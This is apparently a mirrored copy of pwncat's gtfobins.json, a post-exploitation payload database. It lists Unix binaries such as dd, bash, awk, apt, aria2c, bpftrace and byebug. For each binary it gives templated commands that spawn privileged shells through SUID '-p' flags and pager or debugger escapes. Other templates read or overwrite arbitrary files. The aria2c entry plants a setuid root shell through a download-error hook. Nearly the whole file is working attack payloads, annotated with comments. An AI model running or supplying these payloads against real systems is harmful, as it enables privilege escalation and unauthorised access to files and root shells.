1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-24 01:25:37 +01:00
pwncat/data/gtfobins.json
2020-05-12 23:31:25 -04:00

250 lines
5.6 KiB
JSON

{
// Each item is a list of capabilities for this binary
"dd": [
{
// This is a read capability
"type": "read",
// No other commands need to be executed besides the command
// "command" exands to the binary path and any arguments provided
// If the data needs to be dealt with earlier, you can use "{data}"
// here.
"payload": "{command} 2>/dev/null",
// This is used to pass arguments to the application (auto-merged
// into "{command}".
"args": ["if={lfile}"],
// Prepends arguments, if any to the "args" for setuid context.
"suid": [],
// Input which needs to be passed to the application. All insertions
// work here (such as {lfile}, {command}), but also {data} if you are
// streaming the data to the remote application.
"input": "",
// If needed, specify some data that must be sent to exit the remote
// application after the read is finished.
// "exit": "{ctrl_c}",
// This specifies how to handle the data. There can be a few
// different values here:
// - raw -> the data is unchanged and the controlling terminal
// is set to raw mode for effective reading. This mode
// requires a known data length and the command will fail
// without it.
// - print -> the data is unchanged, but the controlling
// terminal is not changed to raw mode. Only printable
// data is safe from TTY translation.
// - base64 -> all data is converted from base64. Data sent
// to the remote process should be in base64 form, and the
// tty is not set to raw mode.
// - hex -> same as base64, but base16 instead.
"stream": "raw"
},
{
"type": "write",
"stream": "raw",
"payload": "{command} 2>/dev/null",
"args": ["of={lfile}", "iflag=count_bytes,fullblock", "count={length}"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} 2>/dev/null",
"args": ["of={lfile}"],
"exit": "{ctrl_d}"
}
],
// Another example
"bash": [
{
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-c", "'{cat} {lfile}'"],
"suid": ["-p"]
},
{
"type": "write",
"stream": "base64",
"payload": "{command}",
"args": ["-c", "'{base64} -d > {lfile}'"],
"suid": ["-p"],
"exit": "{ctrl_d}{ctrl_d}"
}
],
"dash": [
{
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} -c '{cat} {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_d}"
},
{
"type": "write",
"stream": "base64",
"payload": "{command} -c '{base64} -d > {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_d}"
}
],
"cat": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile}"
}
],
"apt": [
{
"type": "shell",
"args": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
"apt-get": [
{
"type": "shell",
"args": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
"aria2c": [
{
"type": "shell",
"payload": "export TF=$({mktemp}); export SH=$({mktemp}); {cp} {shell} $SH; echo \"{chown} root:root $SH; {chmod} +sx $SH\" > $TF; {chmod} +x $TF; {command}; sleep 1; $SH -p",
"input": "rm $TF; rm $SH; unset TF; unset $SH;\n",
"args": ["--on-download-error=$TF", "http://x"],
"exit": "exit"
}
],
"ash": [
{
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} -c '{cat} {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_c}"
},
{
"type": "write",
"stream": "base64",
"payload": "{command} -c '{base64} -d > {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_c}"
}
],
"awk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while ((getline) > 0){{ print >> LFILE }}'"
]
}
],
"gawk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while ((getline) > 0){{ print >> LFILE }}'"
]
}
],
"base32": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {base32} -d",
"args": []
}
],
"base64": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {base64} -d",
"args": []
}
],
"bpftrace": [
{
"type": "shell",
"args": ["-c", "'{shell} -p'", "-e", "'END {{exit()}}'"],
"suid": ["-p"],
"exit": "exit"
}
],
"busctl": [
{
"type": "shell",
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
"byebug": [
{
"type": "shell",
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"],
"exit": "exit"
},
{
"type": "read",
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"],
"exit": "exit"
}
]
}